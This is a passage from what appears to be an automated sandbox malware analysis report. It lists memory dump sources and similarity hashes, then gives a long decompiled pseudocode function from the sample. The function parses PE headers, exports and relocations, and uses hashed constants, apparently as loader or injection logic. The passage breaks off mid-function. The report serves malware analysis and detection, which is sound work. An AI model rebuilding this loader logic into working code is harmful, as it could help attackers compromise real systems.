0x6e7816ab
0x6e7816ab
0x6e7815ca
0x6e7815d1
0x6e7815e7
0x6e7815e7

Strings

)8GV, xrefs: 6E7827FD
)8GV, xrefs: 6E781956

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: )8GV$)8GV
API String ID: 0-993736920
Opcode ID: 9d95d35e69b06d9c2b19d16dcb83601f66b86d9d0fbf691ee55a595b3de48e96
Instruction ID: 97332ce9aaead2b2b7e0b5590d843952cd01f1be09189768a445726e8f7b38f9
Opcode Fuzzy Hash: 9d95d35e69b06d9c2b19d16dcb83601f66b86d9d0fbf691ee55a595b3de48e96
Instruction Fuzzy Hash: 36A294719187819AE330DFA4DE55BEFB3E8AFE2218F004F1DE289521A2EF319554C752

Uniqueness

Uniqueness Score: -1.00%

Function 6E78ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E6E78ACD0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v192;
				char _v196;
				char _v200;
				char _v216;
				char _v220;
				char _v232;
				char _v248;
				void* _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				void* _v276;
				char _v280;
				signed int _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int _v304;
				char _v308;
				char _v312;
				char _v316;
				signed int _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _v364;
				char _v368;
				void* _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				void* _v440;
				char _v444;
				void* _v448;
				char _v452;
				char _v460;
				intOrPtr _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				char _v480;
				void* _v484;
				void* _v488;
				intOrPtr _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				intOrPtr _v508;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void* _v548;
				intOrPtr _v552;
				void* _v556;
				char _v560;
				signed short* _v564;
				signed int _v568;
				signed int _v572;
				char _v576;
				intOrPtr _v580;
				signed int _v584;
				void* _v588;
				void* _v592;
				void* _v596;
				char _v604;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v636;
				intOrPtr _v640;
				char _v644;
				void* _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v676;
				signed int _v680;
				intOrPtr _v700;
				void* _v704;
				void* _v708;
				void* _v716;
				intOrPtr _v724;
				intOrPtr _v732;
				signed int _v736;
				signed int _v740;
				intOrPtr _v744;
				void* _v748;
				void* _v756;
				void* _v764;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				void* _v788;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v856;
				void* _v860;
				void* _v868;
				void* _v872;
				void* _v876;
				void* _v880;
				void* _v888;
				void* _v892;
				void* _v908;
				void* _v940;
				void* _v944;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t632;
				void* _t667;
				signed int _t672;
				char _t747;
				signed int _t768;
				signed int _t770;
				signed int _t778;
				char* _t781;
				signed int _t782;
				signed int _t793;
				signed int _t795;
				char* _t798;
				signed int _t799;
				signed int _t810;
				signed int _t812;
				signed int _t813;
				signed int _t815;
				intOrPtr _t865;
				intOrPtr _t900;
				signed int _t911;
				char _t974;
				signed char* _t1005;
				signed int _t1006;
				void* _t1008;
				void* _t1011;
				intOrPtr _t1017;
				signed int _t1021;
				char _t1030;
				char _t1035;
				signed int _t1036;
				char* _t1038;
				signed int _t1040;
				signed int _t1041;
				signed int* _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				void* _t1055;
				void* _t1065;
				char* _t1154;
				signed int _t1326;
				signed short* _t1435;
				void* _t1438;
				char* _t1449;
				char* _t1452;
				signed int _t1455;
				signed int _t1457;
				signed int _t1459;
				signed int _t1460;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1481;
				void* _t1485;
				signed int _t1487;
				char _t1498;
				void* _t1499;
				void* _t1500;
				char _t1503;
				void* _t1514;
				void* _t1518;
				char _t1531;
				signed int _t1537;
				signed int _t1538;
				signed int _t1539;
				char _t1540;
				intOrPtr _t1542;
				signed int _t1543;
				signed int _t1545;
				void* _t1547;
				void* _t1567;
				void* _t1569;
				signed int _t1570;
				void* _t1572;
				void* _t1573;
				void* _t1574;
				void* _t1576;

				_t1572 = (_t1570 & 0xfffffff0) - 0x254;
				_v540 = __edx;
				_v28 = __ecx;
				_t1534 =  *((intOrPtr*)(__ecx + 0xc));
				E6E7915C0(0x57325ee3, 0xb7186560);
				_push(0);
				E6E7A9350( &_v192);
				_v180 = 0;
				_push(0);
				E6E7A9350( &_v176);
				_push(0);
				E6E7A9350( &_v76);
				_v536 = 0x58d59bc9;
				asm("pxor xmm0, xmm0");
				asm("movq [esp+0x68], xmm0");
				E6E7A9670( &_v80, E6E7A9650( &_v80) + 0x10);
				E6E7A9640( &_v84, E6E7A9650( &_v84) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v544 = 0x3b4caff7;
				asm("movq [esp+0x68], xmm1");
				E6E7A9670( &_v88, E6E7A9650( &_v88) + 0x10);
				E6E7A9640( &_v92, E6E7A9650( &_v92) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v552 = 0xd9ff67e3;
				asm("movq [esp+0x68], xmm1");
				E6E7A9670( &_v96, E6E7A9650( &_v96) + 0x10);
				E6E7A9640( &_v100, E6E7A9650( &_v100) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v560 = 0xbcd9ca71;
				asm("movq [esp+0x68], xmm1");
				E6E7A9670( &_v104, E6E7A9650( &_v104) + 0x10);
				E6E7A9640( &_v108, E6E7A9650( &_v108) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v568 = 0x1be15feb;
				asm("movq [esp+0x68], xmm1");
				E6E7A9670( &_v112, E6E7A9650( &_v112) + 0x10);
				E6E7A9640( &_v116, E6E7A9650( &_v116) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v576 = 0xebe915fa;
				asm("movq [esp+0x68], xmm1");
				E6E7A9670( &_v120, E6E7A9650( &_v120) + 0x10);
				E6E7A9640( &_v124, E6E7A9650( &_v124) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [eax], xmm0");
				E6E7B1270(0x588ab3ea,  &_v128);
				E6E7A9640( &_v128, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1d8], xmm0");
				E6E7A9640( &_v132, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1e0], xmm0");
				E6E7A9640( &_v136, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f0], xmm0");
				E6E7A9640( &_v140, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f8], xmm0");
				E6E7A9640( &_v144, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x200], xmm0");
				E6E7A9640( &_v148, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [eax-0x38], xmm0");
				 *((intOrPtr*)( &_v128 - 0x98)) = _t1534;
				E6E78D570( &_v280,  &_v136,  &_v128);
				_t1487 = _v140;
				_t1027 = _v136;
				if((_t1487 | _v136) != 0) {
					_push(0x40);
					E6E7A9350( &_v288);
					E6E7B0FA0(_t1534, E6E7A9640( &_v292, 0), __eflags, _t1487, _t1027, 0x40, 0);
					_t1435 = E6E7A9640( &_v312, 0);
					__eflags = ( *_t1435 & 0x0000ffff) - 0x5a4d;
					if(( *_t1435 & 0x0000ffff) == 0x5a4d) {
						asm("cdq");
						_v560 = _t1435[0x1e] + _t1487;
						asm("adc edx, ebx");
						_v564 = _t1435;
						_push(0x108);
						E6E7A9350( &_v388);
						E6E7B0FA0(_t1534, E6E7A9640( &_v392, 0), __eflags, _v568, _v572, 0x108, 0);
						_push( &_v412);
						E6E7A9520( &_v316);
						E6E7A9510( &_v416);
						_t632 = E6E7A9640( &_v320, 0);
						__eflags =  *_t632 - 0x4550;
						if( *_t632 != 0x4550) {
							goto L3;
						} else {
							_t1481 =  *(_t632 + 0x88);
							_v568 = _t1481;
							_v572 =  *((intOrPtr*)(_t632 + 0x8c));
							__eflags = _t1481;
							if(_t1481 == 0) {
								goto L3;
							} else {
								__eflags = _v572;
								if(_v572 == 0) {
									goto L3;
								} else {
									_push(_v572);
									E6E7A9350( &_v396);
									_t1011 = E6E7A9640( &_v400, 0);
									asm("adc ebx, 0x0");
									E6E7B0FA0(_t1534, _t1011, __eflags, _t1487 + _v576, _t1027, _v580, 0);
									_push( &_v420);
									E6E7A9520( &_v324);
									E6E7A9510( &_v424);
									_t1065 = E6E7A9640( &_v328, 0);
									_t1017 =  *((intOrPtr*)(_t1572 + 0x44));
									 *((intOrPtr*)(_t1065 + 0x1c)) =  *((intOrPtr*)(_t1065 + 0x1c)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x24)) =  *((intOrPtr*)(_t1065 + 0x24)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x20)) =  *((intOrPtr*)(_t1065 + 0x20)) - _t1017;
									_t1485 = E6E7A9640( &_v332,  *((intOrPtr*)(_t1065 + 0x20)) - _t1017);
									__eflags =  *(_t1065 + 0x18);
									if( *(_t1065 + 0x18) > 0) {
										_v560 = _t1534;
										_t1021 = 0;
										__eflags = 0;
										_t1531 = _v576;
										while(1) {
											_t1021 = _t1021 + 1;
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) - _t1531;
											_t554 = _t1021 - 1; // 0x0
											_t1567 = _t1021 + _t1021;
											__eflags = _t1021 + _t554 -  *(_t1065 + 0x18);
											if(_t1021 + _t554 >=  *(_t1065 + 0x18)) {
												break;
											}
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) - _t1531;
											__eflags = _t1567 -  *(_t1065 + 0x18);
											if(_t1567 <  *(_t1065 + 0x18)) {
												continue;
											}
											break;
										}
										_t1534 = _v560;
									}
									_push( &_v308);
									E6E7A93D0( &_v292);
								}
							}
						}
					} else {
						L3:
						_push(0);
						E6E7A9350( &_v284);
					}
					E6E7A9510( &_v304);
					E6E7AA110( &_v88);
					_v544 = 0x41195991;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E6E7A9670( &_v88, E6E7A9650( &_v88) + 0x10);
					E6E7A9640( &_v92, E6E7A9650( &_v92) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v552 = 0x77be1f6;
					asm("movq [esp+0x68], xmm1");
					E6E7A9670( &_v96, E6E7A9650( &_v96) + 0x10);
					E6E7A9640( &_v100, E6E7A9650( &_v100) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v560 = 0xb5cdecc0;
					asm("movq [esp+0x68], xmm1");
					E6E7A9670( &_v104, E6E7A9650( &_v104) + 0x10);
					E6E7A9640( &_v108, E6E7A9650( &_v108) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1573 = _t1572 + 0xfffffff4;
					asm("movups [eax], xmm0");
					asm("movq xmm1, [edx+0xd8]");
					asm("movq [esp], xmm1");
					_v668 =  &_v112;
					E6E78E780( &_v312, _t1534, __eflags);
					E6E7A9640( &_v124, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x1e8], xmm0");
					E6E7A9640( &_v128, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x210], xmm0");
					_t1438 = E6E7A9640( &_v132, 0x20);
					_v268 =  *((intOrPtr*)(_t1438 + 8));
					 *((intOrPtr*)(_t1573 + 0x218)) =  *((intOrPtr*)(_t1438 + 0xc));
					_push(0);
					E6E7A9350( &_v320);
					_push(0);
					E6E7A9350( &_v308);
					_push(0);
					_push( *0x6e7b9d74);
					E6E791BA0(__eflags,  &_v284);
					E6E7A9B10( &_v340);
					E6E7A0B10( &_v284);
					E6E7A9670( &_v328, E6E7A9A90( &_v344, _t1534));
					_t667 = E6E7A9640( &_v348, 0);
					E6E78AC20(_t1569, _t667, E6E7A9640( &_v336, 0), _v296);
					_t1574 = _t1573 + 8;
					_t1030 = E6E7A9650( &_v340);
					_t95 = _t1030 + 2; // 0x2
					_v180 = E6E78D860( &_v300, 0x20000000, __eflags, _t95);
					_v640 = 0x20000000;
					_t672 = E6E78DB60( &_v304, 0x80000000, __eflags, 0x82);
					_v192 = _t672;
					 *(_t1574 + 0x220) = 0x80000000;
					__eflags = _t672 |  *(_t1574 + 0x220);
					if((_t672 |  *(_t1574 + 0x220)) == 0) {
						L6:
						E6E7A9510( &_v288);
						E6E7A9510( &_v304);
						E6E7A9510( &_v320);
						E6E7A9510( &_v120);
						E6E78E2F0(_t1030, _t1574 + 0x1bc, _t1569);
						E6E7A9510(_t1574 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						__eflags = _v124 | _v584;
						if((_v124 | _v584) != 0) {
							E6E790B70( &_v560, 0, 0x80);
							_t1576 = _t1574 + 0xc;
							_v464 = _a4;
							_push(0);
							_push(0);
							E6E7B2060(_t1030,  &_v400, 0, _t1534);
							_v348 =  *((intOrPtr*)(_t1576 + 0x48));
							_t1449 =  &_v408;
							 *((intOrPtr*)(_t1449 + 0x38)) = _a8;
							_push(_t1449);
							E6E78E090( &_v384, _t1534,  &_v352);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xb0], xmm1");
							_v508 = E6E7A9650(_a8);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xc0], xmm1");
							_v492 = E6E7A9650(_v620);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [edi-0xb8], xmm1");
							E6E7B0FA0(_t1534,  &_v460, __eflags, _v272, _v156, 7,  &_v292);
							_t1154 =  &_v156;
							 *((intOrPtr*)(_t1154 - 0x148)) = _v288;
							 *((intOrPtr*)(_t1154 - 0x144)) =  *((intOrPtr*)(_t1154 - 0x10));
							E6E7AA110(_t1154);
							_v612 = 0x9cac62c7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x68], xmm0");
							E6E7A9670( &_v156, E6E7A9650( &_v156) + 0x10);
							E6E7A9640( &_v160, E6E7A9650( &_v160) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v620 = 0xa8f2638d;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670( &_v164, E6E7A9650( &_v164) + 0x10);
							E6E7A9640( &_v168, E6E7A9650( &_v168) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v628 = 0xd8cc7390;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670( &_v172, E6E7A9650( &_v172) + 0x10);
							E6E7A9640( &_v176, E6E7A9650( &_v176) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v636 = 0x6a68465a;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670( &_v180, E6E7A9650( &_v180) + 0x10);
							E6E7A9640(_t1576 + 0x22c, E6E7A9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v644 = 0x58d59bc9;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670(_t1576 + 0x22c, E6E7A9650(_t1576 + 0x228) + 0x10);
							E6E7A9640( &_v192, E6E7A9650( &_v192) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t1576 + 0x60)) = 0xe9fbf3a8;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670( &_v196, E6E7A9650( &_v196) + 0x10);
							E6E7A9640( &_v200, E6E7A9650( &_v200) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v660 = 0x649746ec;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670(_t1576 + 0x22c, E6E7A9650(_t1576 + 0x228) + 0x10);
							E6E7A9640(_t1576 + 0x22c, E6E7A9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v668 = 0x35b39b2b;
							asm("movq [esp+0x68], xmm1");
							E6E7A9670(_t1576 + 0x22c, E6E7A9650(_t1576 + 0x228) + 0x10);
							E6E7A9640( &_v216, E6E7A9650( &_v216) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							_t1452 =  &_v220;
							asm("movups [eax], xmm0");
							E6E7B1270(0x588ab3ea, _t1452);
							E6E7A9640( &_v220, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x70], xmm0");
							E6E7A9640(_t1576 + 0x22c, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x78], xmm0");
							E6E7A9640(_t1576 + 0x22c, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x80], xmm0");
							E6E7A9640( &_v232, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x88], xmm0");
							E6E7A9640(_t1576 + 0x22c, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x90], xmm0");
							E6E7A9640(_t1576 + 0x22c, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x98], xmm0");
							E6E7A9640(_t1576 + 0x22c, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0xa0], xmm0");
							E6E7A9640( &_v248, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [ecx-0x100], xmm0");
							_t747 = E6E78D530( &_v380, _t1452);
							_v396 = _t747;
							_v400 = _t1452;
							_t1496 = _t1452 - 0xffffffff;
							__eflags = _t747 - 0xffffffff | _t1452 - 0xffffffff;
							if((_t747 - 0xffffffff | _t1452 - 0xffffffff) == 0) {
								E6E78E230( &_v388);
								E6E7B2530(_t1030,  &_v412, 0xffffffff, _t1496, _t1534);
								E6E7A9510( &_v300);
								E6E7A9510( &_v316);
								E6E7A9510( &_v332);
								E6E7A9510( &_v132);
								E6E78E2F0(_t1030, _t1576 + 0x1bc, _t1569);
								E6E7A9510( &_v256);
								__eflags = 0;
								return 0;
							} else {
								_t1455 = _v108 | _v104;
								__eflags = _t1455;
								if(_t1455 == 0) {
									_v604 = _t1030;
									_t1498 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t1576 + 0x54)) = _t1534;
									do {
										_push(0);
										E6E7A9350( &_v428);
										E6E7916B0(_t1498, _t1534,  &_v376, 0x57325ee3);
										E6E79FDB0( &_v384,  &_v376);
										_t1456 = 0x7fffffff;
										E6E7A9710( &_v444, _v380, E6E7A6040(_v380, 0x7fffffff));
										E6E7A0B10( &_v388);
										E6E798CA0( &_v396);
										_t1537 = _v168;
										_t1034 =  *((intOrPtr*)( &_v452 + 0x120));
										_t768 = E6E7A9650( &_v452);
										__eflags = _t768;
										if(_t768 <= 0) {
											L25:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v680 = 5;
											_v676 = _v280;
											asm("movq xmm1, [esp+0x210]");
											 *(_t1576 + 0x10) = _v284;
											asm("movq [esp+0x14], xmm1");
											_t1034 = _v148;
											_v660 = _v148;
											_t1534 = _v144;
											_v656 = _v144;
											asm("movq [esp+0x24], xmm2");
											asm("movq [esp+0x2c], xmm2");
											_t770 = E6E7B04B0(_t1498, _v144);
											__eflags = _t770;
											if(_t770 == 0) {
												E6E7922A0(0x3e8, _t1456);
												E6E7A9510( &_v432);
												_t1455 =  &_v120;
												E6E78D570( &_v264, _t1455,  &_v112);
												__eflags = _v116 | _v112;
												if((_v116 | _v112) != 0) {
													_t1030 =  *((intOrPtr*)(_t1576 + 0x50));
													_t1534 = _v604;
													goto L9;
												} else {
													_t974 = E6E78D530( &_v264, _t1455);
													_v280 = _t974;
													_v284 = _t1455;
													_t1479 = _t1455 - 0xffffffff;
													__eflags = _t974 - 0xffffffff | _t1455 - 0xffffffff;
													if((_t974 - 0xffffffff | _t1455 - 0xffffffff) == 0) {
														E6E78E230( &_v392);
														E6E7B2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
														E6E7A9510( &_v304);
														E6E7A9510( &_v320);
														E6E7A9510( &_v336);
														E6E7A9510( &_v136);
														E6E78E2F0(_t1034, _t1576 + 0x1bc, _t1569);
														E6E7A9510( &_v260);
														__eflags = 0;
														return 0;
													} else {
														goto L29;
													}
												}
											} else {
												goto L26;
											}
										} else {
											__eflags = 0;
											_v624 = _t1498;
											_t1498 = _t1537;
											_t1534 = 0;
											while(1) {
												_t1005 = E6E7A9640( &_v432, _t1534);
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												 *((intOrPtr*)(_t1576 + 8)) = 5;
												_v680 = _v284;
												asm("movq xmm1, [esp+0x1f8]");
												_v676 = _v288;
												_t1456 =  *_t1005 & 0x000000ff;
												asm("movq [esp+0x14], xmm1");
												asm("movq xmm2, [0x6e7b9d40]");
												 *((intOrPtr*)(_t1576 + 0x1c)) = _t1498;
												_v660 = _t1034;
												_v656 =  *_t1005 & 0x000000ff;
												 *((intOrPtr*)(_t1576 + 0x28)) = 0;
												asm("movq [esp+0x2c], xmm2");
												_t1006 = E6E7B04B0(_t1498, _t1534);
												__eflags = _t1006;
												if(_t1006 != 0) {
													break;
												}
												E6E7922A0(0x64, _t1456);
												_t1498 = _t1498 + 1;
												asm("adc ebx, 0x0");
												_t1534 = _t1534 + 1;
												_t1008 = E6E7A9650( &_v432);
												__eflags = _t1534 - _t1008;
												if(_t1534 < _t1008) {
													continue;
												} else {
													_t1498 = _v624;
													goto L25;
												}
												goto L95;
											}
											L26:
											E6E7A9510( &_v432);
											E6E78E230( &_v392);
											E6E7B2530(_t1034,  &_v416, _t1456, _t1498, _t1534);
											E6E7A9510( &_v304);
											E6E7A9510( &_v320);
											E6E7A9510( &_v336);
											E6E7A9510( &_v136);
											E6E78E2F0(_t1034, _t1576 + 0x1bc, _t1569);
											E6E7A9510( &_v260);
											__eflags = 0;
											return 0;
										}
										goto L95;
										L29:
										_t1498 = _t1498 + 1;
										__eflags = _t1498 - 0xa;
									} while (_t1498 != 0xa);
									E6E78E230( &_v392);
									E6E7B2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
									E6E7A9510( &_v304);
									E6E7A9510( &_v320);
									E6E7A9510( &_v336);
									E6E7A9510( &_v136);
									E6E78E2F0(_t1034, _t1576 + 0x1bc, _t1569);
									E6E7A9510( &_v260);
									__eflags = 0;
									return 0;
								} else {
									L9:
									 *((intOrPtr*)(_t1576 + 0x50)) = _t1030;
									_t1499 = 0;
									__eflags = 0;
									_v604 = _t1534;
									_t1538 = _v284;
									_t1035 = _v280;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq xmm1, [esp+0x1f8]");
										asm("pxor xmm2, xmm2");
										asm("movq [esp], xmm0");
										_v680 = 5;
										_v676 = _t1035;
										 *(_t1576 + 0x10) = _t1538;
										asm("movq [esp+0x14], xmm1");
										_v660 = _v148;
										asm("movq xmm3, [0x6e7b9d48]");
										_v656 = _v144;
										asm("movq [esp+0x24], xmm2");
										asm("movq [esp+0x2c], xmm3");
										_t778 = E6E7B04B0(_t1499, _t1538);
										__eflags = _t778;
										if(_t778 == 0) {
											break;
										}
										_t1035 = E6E78D530( &_v264, _t1455);
										_t1538 = _t1455;
										_t1455 = _t1538 - 0xffffffff;
										__eflags = _t1035 - 0xffffffff | _t1455;
										if((_t1035 - 0xffffffff | _t1455) == 0) {
											E6E78E230( &_v392);
											E6E7B2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
											E6E7A9510( &_v304);
											E6E7A9510( &_v320);
											E6E7A9510( &_v336);
											E6E7A9510( &_v136);
											E6E78E2F0(_t1035, _t1576 + 0x1bc, _t1569);
											E6E7A9510( &_v260);
											__eflags = 0;
											return 0;
										} else {
											_t1499 = _t1499 + 1;
											__eflags = _t1499 - 0xa;
											if(_t1499 != 0xa) {
												continue;
											} else {
												E6E78E230( &_v392);
												E6E7B2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
												E6E7A9510( &_v304);
												E6E7A9510( &_v320);
												E6E7A9510( &_v336);
												E6E7A9510( &_v136);
												E6E78E2F0(_t1035, _t1576 + 0x1bc, _t1569);
												E6E7A9510( &_v260);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v284 = _t1538;
									_t1500 = 0;
									__eflags = 0;
									_v280 = _t1035;
									_t1539 = _v284;
									_t1036 = _v280;
									while(1) {
										_push(0x80);
										_push(_v144);
										_push(_v148);
										_push(_t1539);
										_push(_t1036);
										_t1457 =  &_v576;
										__eflags = E6E78D170( &_v264, _t1457);
										if(__eflags != 0) {
											break;
										}
										_t1036 = E6E78D530( &_v284, _t1457);
										_t1539 = _t1457;
										_t1477 = _t1539 - 0xffffffff;
										__eflags = _t1036 - 0xffffffff | _t1539 - 0xffffffff;
										if((_t1036 - 0xffffffff | _t1539 - 0xffffffff) == 0) {
											E6E78E230( &_v412);
											E6E7B2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
											E6E7A9510( &_v324);
											E6E7A9510( &_v340);
											E6E7A9510( &_v356);
											E6E7A9510( &_v156);
											E6E78E2F0(_t1036,  &_v264, _t1569);
											E6E7A9510( &_v280);
											__eflags = 0;
											return 0;
										} else {
											_t1500 = _t1500 + 1;
											__eflags = _t1500 - 0xa;
											if(_t1500 != 0xa) {
												continue;
											} else {
												E6E78E230( &_v412);
												E6E7B2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
												E6E7A9510( &_v324);
												E6E7A9510( &_v340);
												E6E7A9510( &_v356);
												E6E7A9510( &_v156);
												E6E78E2F0(_t1036,  &_v264, _t1569);
												E6E7A9510( &_v280);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v300 = _t1036;
									 *((intOrPtr*)(_t1576 + 0x64)) = _v620;
									asm("cdq");
									asm("movd xmm1, ebx");
									_t1038 =  &_v616;
									_t1501 =  *((intOrPtr*)(_t1038 + 0x1c8));
									_t781 =  &_v604;
									 *(_t781 + 0x12c) = _t1539;
									asm("movd xmm0, edx");
									asm("punpckldq xmm1, xmm0");
									_t1540 =  *((intOrPtr*)(_t781 - 0x14));
									 *((intOrPtr*)(_t781 - 0xc)) = 0;
									 *((intOrPtr*)(_t781 - 8)) =  *((intOrPtr*)(_t1038 + 0x1c8));
									asm("movdqu [eax-0x28], xmm1");
									asm("movq [eax], xmm1");
									_t1459 =  &_v612;
									_t782 = E6E7B0C90(_t1540, _t1459, __eflags, _t781, 0x40, _t1038);
									__eflags = _t782;
									if(_t782 != 0) {
										E6E78E230( &_v412);
										E6E7B2530(_t1038,  &_v436, _t1459, _t1501, _t1540);
										E6E7A9510( &_v324);
										E6E7A9510( &_v340);
										E6E7A9510( &_v356);
										E6E7A9510( &_v156);
										E6E78E2F0(_t1038,  &_v264, _t1569);
										E6E7A9510( &_v280);
										__eflags = 0;
										return 0;
									} else {
										__eflags = 0;
										_v624 = _t1540;
